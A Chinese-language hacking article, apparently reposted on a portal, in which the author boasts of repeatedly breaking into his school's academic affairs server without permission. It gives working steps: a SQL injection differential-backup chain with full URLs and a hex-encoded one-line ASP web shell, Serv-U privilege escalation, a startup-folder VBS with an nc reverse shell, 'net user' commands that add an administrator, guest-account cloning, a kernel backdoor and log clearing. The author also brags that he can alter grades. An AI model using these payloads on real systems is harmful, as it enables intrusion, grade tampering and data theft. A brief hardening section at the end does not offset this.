分享
 
 
 

N次杀入学校教务处

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

已经不记得是第几次进入学校教务处啦,反正每次都有不同的理由。好笑的是每次管理员只是发现入侵者,简单的做了下防护,而没有注意到其它安全的问题。所以就有了我X次入侵的过程。最重要的是觉得如果是黑客/安全技术爱好者的话,学校的网站是一定要拿下的,我已经拿下了学校的主网站和教务处网站,而这两个网站都是我们学校网站重中之重的网站,而且学校教务处网站有我们全校学生的成绩数据库,平时我们查成绩的时候就要用到这个网站。

在我的印象中比较深刻的有三次进入到教务处网站。第一次是刚到学校读书的时候,老师老是叫我们到教务处找考试的消息。我就注意到教务处网站的重要性啦。当时还是sql注入和上传最流行的时候。当然我们学校网站也不例外啊。教务处网站用的是windows 2000 server系统。浏览下教务处网站觉得做的还不错的啊,扫了下开放的端口和检查下sql注入,竟然没有找到任何的漏洞(当时还是静态网站)。我不相信没有漏洞,也怀疑是不是学校有高人存在的原因。拿出啊D的注入工具找上传的网页,当出现有http://xxx.xxx.xxx.xxx/bbs/upfile1.asp的时候,我心里一阵狂喜。打开后才知道dvbbs6.0论坛上传网页。原来管理员把上传页面改了。呵呵,对不起啦,找到压箱宝底桂林老兵的上传利用程序上传asp木马,拿到了webshell。扫了下21端口,网站用的还是serv-u4.0版本,最后上传su.exe溢出拿到了网站的绝对权限。网站还开了3389也省了我开终端端口,克隆了guest帐号,读出管理员的密码,清理脚印走人。当时也是得意的很啊。我想管理员不会轻易发现我的存在了吧。过了很长一段时间,用克隆的帐号进入主机的时候,发现我再也进不去啦。管理员的密码也进不去,当时也很生气学校要我们交这个方面的钱,那个方面的钱。不得不让我再次下定决心入侵教务处,也就有了我的第二次。这次学校网站也改为动态的网站啦,用的是asp的程序。我想管理员发现了入侵者不一定在web程序上下功夫。打开留下的asp木马果然还在。当我再次拿出su.exe程序溢出时发现怎么也登陆不上主机。扫了下端口。晕的是管理员竟然把serv-u卸载啦。su溢出取得权限已经行不通啦。在主机上找有没有什么可以利用的漏洞。可恶的是管理员没有留下可以直接取得权限的东西。留下的asp木马可以浏览任意盘,看来也只有走这条路啦。思路是写个死循环,放个vbs到启动项目去。当主机启动时也就启动了我留下的后门。我的vbs放在c:\Documents and Settings\Administrator\「开始」菜单\程序\启动\shell.vbs下。利用瑞士军刀nc反向连接返回一个cmdshell,运行死循环的批处理。此时的cmdshell是guest权限,而guest权限下的确是有能力让主机重起的。(guest权限下重起代码已经打包给大家了)这个时候就只有等待咯。当黑客也是要有耐心的。呵呵,果然过了几天的时间网站打不开了,我想管理员应该去重新启动下主机了吧,后来也理所当然的再次拿到了主机的绝对权限。也再次克隆了guest帐号和管理员的密码。

快要毕业了,学生一切的行动都要按照教务处的去做。呵呵我有网站的绝对权限我怕什么(后来学校把成绩这一块也放到了教务处)。我想怎么改成绩就怎么改。某一天,当我再次得意的用guest帐号和管理员密码进入主机的时候,它对我说"NO"。哦,当时我快疯掉啦,快要毕业了这么紧要的关头我再次与教务处网站说"BYEBYE"。我在想不知道是那个名人说过"如果连自己学校的网站都搞不定,他不适合当黑客"。这句话对我的印象很深刻。也就有了我最进的第三次比较深刻的入侵,也就是本文要讲的核心内容。(前二次是"过去式",没有给大家抓图,对不起各位看官啦:))后来教务处有了很大的变化,我的asp木马终于被管理员发现了。webshell也就没有啦。dvbbs论坛也被删掉了。看来走上传拿到webshell行不通。网站不是用的asp的程序吗,看有没有sql注入漏洞。经过检查典型的sql注入漏洞。拿出大名鼎鼎的nbsi扫下,原来是DB_OWNER的权限(图一)。

哦,现在教务处用的是asp+mssql黄金组合。利用sqlhello.exe远程溢出程序,怎么也返回不了主机的cmdshell,看来溢出这条路也行不通啦。好的,整理下思路,首先是利用备份差异拿到webshell。当然要知道网站的数据库是不是放在同一个网站上呐,用nbsi的列目录功能,幸运的是数据库和web是同一个主机上的。(图二)

好的,紧张的时刻到了,差异备份得到webshell。第一步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x6A776368627565 backup database @a to disk=@s--备份当前数据库,以差异备份.(其中0x6A776368627565是我的当前数据库jwchbue)第二步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;Drop table [huanle];create table [dbo].[huanle] ([cmd] [image])-- 建表加字段。第三步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;insert into huanle(cmd) values(0x3C2565786563757465207265717565737428224E6565616F2229253E)-- 写入蓝屏大叔一句话木马。第四步http://xxx.xxx.xxx.xxx/News_template.asp?id=395;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C6A77635C7368656C6C2E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--。(0x643A5C6A77635C7368656C6C2E617370是备份得到webshell路径d:\jwc\shell.asp)。再次以差异备份得到插入有蓝屏大叔一句话木马的WEBSHELL 。备份得到webshell路径是http://xxx.xxx.xxx.xxx/shell.asp。第五步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;Drop table [huanle]-- 删除建立的表。小心使得万年船:)。打开备份得到的网页。http://xxx.xxx.xxx.xxx/shell.asp.出现了错误。(图三)

说明你已经成功啦。利用蓝屏客户端连接,添上你的asp木马。(图四)

提交后出现了令人激动的asp木马。(图五)。

小样看你能飞出我的五指山!!呵呵!!!扫描下是否开放了ftp端口。幸运的是管理员仍然用的是serv-u4.0版本的。(图六)

看来取得权限只是时间上的问题啦。利用刚刚得到的asp木马上传一个超级大马桂林老兵的asp站长助手。(图七)

仍然可以浏览任意盘,并且可以利用cmd.exe .上传serv-u的本地溢出程序,net user test test /add,net localgroup administrators test /add(图八)。

就这样第X次拿到学校教务处的绝对权限。因为开了3389所以不费力气去开终端,(图九)

这次不会让“肉鸡”跑了。不仅克隆了guest帐号和再次读出了管理员的密码还放了内核级的后门程序,最后当然是清理脚印。我想管理员没有想到这么快会有入侵者再次“光临”吧。

sql注入、上传型漏洞、serv-u提升权限已经流行了很长一段时间啦,说明教务处网站管理员不是很注意网络的安全。从小小的一个sql注入漏洞竟然可以拿到系统的administrator权限是多么恐怖的一件事情。可以看出安全是一个整体。毕竟是自己学校的网站也不好意思去破坏。(本人可是个好人哦)还是帮学校做下安全吧。系统已经打上了sp4和最新的补丁,管理员只是注重系统的安全,也可以说管理员很懒惰。问题的原因还是web程序上出现了漏洞,补上sql防注入的程序,serv-u下个最新的版本,并严格控制权限。mssql也打上了最新的补丁,并且严格控制任意盘的权限,重中之重是控制好c:\program file\serv-u、启动项目、等一些重要的目录的权限。web程序也给出专门的管理人员权限,我想基本上算是安全了吧。本文没有什么技术含量,用到的都是一些常用的入侵方法。比如guest权限下重起主机,这也是提升权限的一个方法。只是想告诉大家入侵并不是一成不变的,如果在入侵中多动下脑收获会更多。文章写作匆忙,难免会有纰漏,还望指正。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有